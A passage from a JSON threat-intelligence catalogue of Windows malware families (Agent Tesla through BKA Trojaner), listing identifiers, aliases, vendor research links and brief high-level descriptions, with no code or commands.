"https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", - "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" - ] - }, - "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", - "value": "Agent Tesla", - "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" - ] - }, - "uuid": "43ec8adc-0658-4765-be20-f22679097fab", - "value": "Aldibot", - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" - ] - }, - "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", - "value": "Project Alice", - "description": "" - }, - { - "meta": { - "synonyms": [ - "alina_spark", - "katrina", - "alina_eagle" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", - "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", - "https://www.nuix.com/blog/alina-continues-spread-its-wings", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/" - ] - }, - "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", - "value": "Alina POS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Starman" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", - "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/", - "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf" - ] - }, - "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", - "value": "Allaple", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" - ] - }, - "uuid": "a0881a0c-e677-495b-b475-290af09bb716", - "value": "Alma Communicator", - 
"description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" - ] - }, - "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", - "value": "AlmaLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", - "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" - ] - }, - "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", - "value": "ALPC Local PrivEsc", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", - "https://twitter.com/JaromirHorejsi/status/813714602466877440" - ] - }, - "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", - "value": "Alphabet Ransomware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", - "https://blog.cylance.com/an-introduction-to-alphalocker" - ] - }, - "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", - "value": "AlphaLocker", - "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. 
The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - }, - "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", - "value": "AlphaNC", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] - }, - "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", - "value": "Alreay", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Olmarik", - "Pihar", - "TDSS", - "TDL" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", - "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", - "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", - "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" - ] - }, - "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", - "value": "Alureon", - 
"description": "" - }, - { - "meta": { - "synonyms": [ - "Adupihan" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", - "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", - "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" - ] - }, - "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", - "value": "AMTsol", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Gamarue", - "B106-Gamarue", - "B67-SS-Gamarue", - "b66" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", - "http://blog.morphisec.com/andromeda-tactics-analyzed", - "https://blog.avast.com/andromeda-under-the-microscope", - "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", - "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", - "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", - "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", - "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", - "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", - "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", - "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", - "http://resources.infosecinstitute.com/andromeda-bot-analysis/", - "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", - "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", - "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", - "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/" - ] - }, - 
"uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", - "value": "Andromeda", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", - "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" - ] - }, - "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", - "value": "Anel", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Latinus" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" - ] - }, - "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", - "value": "Antilam", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", - "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" - ] - }, - "uuid": "d3e16d46-e436-4757-b962-6fd393056415", - "value": "Apocalipto", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", - "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" - ] - }, - "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", - "value": "Apocalypse", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" - ] - }, - "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", - "value": "ArdaMax", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", - "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] - }, - "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", - "value": "Arefty", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Aaron Keylogger" - ], - "type": [], - 
"refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", - "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/", - "http://remote-keylogger.net/" - ] - }, - "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", - "value": "Arik Keylogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", - "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", - "https://twitter.com/Racco42/status/1001374490339790849", - "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" - ] - }, - "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", - "value": "ARS VBS Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" - ] - }, - "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", - "value": "AscentLoader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" - ] - }, - "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", - "value": "ASPC", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Aseljo", - "BadSrc" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", - "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", - "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" - ] - }, - "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", - "value": "Asprox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", - "http://blog.talosintel.com/2017/02/athena-go.html" - ] - }, - "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", - "value": "AthenaGo RAT", - "description": "" - }, - { - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] - }, - "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", - "value": "ATI-Agent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", - "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" - ] - }, - "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", - "value": "ATMii", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", - "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" - ] - }, - "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", - "value": "ATMitch", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", - "https://www.group-ib.com/resources/threat-research/silence.html" - ] - }, - "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", - "value": "Atmosphere", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", - "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", - "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" - ] - }, - "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", - "value": "ATMSpitter", - "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", - "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html", - "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene" - ] - }, - "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", - "value": "August Stealer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Riodrv" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", - "value": "Auriga", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" - ] - }, - "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", - "value": "Aurora", - "description": "Ransomware" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", - "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" - ] - }, - "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", - "value": "AvastDisabler", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", - "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" - ] - }, - "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", - "value": "AVCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", - 
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" - ] - }, - "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", - "value": "Aveo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", - "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" - ] - }, - "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", - "value": "Avzhan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" - ] - }, - "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", - "value": "Ayegent", - "description": "" - }, - { - "meta": { - "synonyms": [ - "PuffStealer", - "Rultazo" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", - "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", - "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", - "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] - }, - "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", - "value": "Azorult", - "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. 
It has been observed in conjunction with Chthonic as well as being dropped by Ramnit." - }, - { - "meta": { - "synonyms": [ - "SNOWBALL" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", - "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "http://www.spiegel.de/media/media-35683.pdf", - "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" - ] - }, - "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", - "value": "Babar", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" - ] - }, - "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", - "value": "BABYMETAL", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - }, - "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", - "value": "backspace", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", - "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", - "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", - "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", - "https://www.cert.pl/en/news/single/backswap-malware-analysis/" - ] - }, - "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", - "value": "BackSwap", - 
"description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", - "https://twitter.com/PhysicalDrive0/status/833067081981710336" - ] - }, - "uuid": "af1c99be-e55a-473e-abed-726191e1da05", - "value": "BadEncript", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - }, - "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", - "value": "badflick", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" - ] - }, - "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", - "value": "BadNews", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" - ] - }, - "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", - "value": "Bagle", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", - "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", - 
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] - }, - "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", - "value": "Bahamut", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", - "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" - ] - }, - "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", - "value": "Banatrix", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", - "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" - ] - }, - "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", - "value": "bangat", - "description": "" - }, - { - "meta": { - "synonyms": [ - "MultiBanker 2", - "BankPatch", - "BackPatcher" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", - "http://blog.kleissner.org/?p=69", - "http://osint.bambenekconsulting.com/feeds/", - "http://blog.kleissner.org/?p=192", - "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" - ] - }, - "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", - "value": "Banjori", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", - "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" - ] - }, - "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", - "value": "Bankshot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" - ] - }, - "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", - "value": "Bart", - "description": "" - }, - { - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", - "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" - ] - }, - "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", - "value": "BatchWiper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" - ] - }, - "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", - "value": "Batel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", - "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" - ] - }, - "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", - "value": "BBSRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" - ] - }, - "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", - "value": "Bedep", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", - "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" - ] - }, - "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", - "value": "beendoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", - "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" - ] - }, - "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", - "value": "BernhardPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Neurevt" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", - 
"https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", - "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", - "http://www.xylibox.com/2015/04/betabot-retrospective.html", - "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", - "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", - "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html", - "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39" - ] - }, - "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", - "value": "BetaBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" - ] - }, - "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", - "value": "BfBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", - "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", - "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", - "https://habrahabr.ru/post/213973/" - ] - }, - "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", - "value": "BillGates", - "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources." 
- }, - { - "meta": { - "synonyms": [ - "zxdosml" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", - "value": "Biscuit", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" - ] - }, - "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", - "value": "Bitsran", - "description": "" - }, - { - "meta": { - "synonyms": [ - "bwin3_bka" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", - "https://www.evild3ad.com/405/bka-trojaner-ransomware/" - ] - }, - "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", - "value": "BKA Trojaner", - "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, 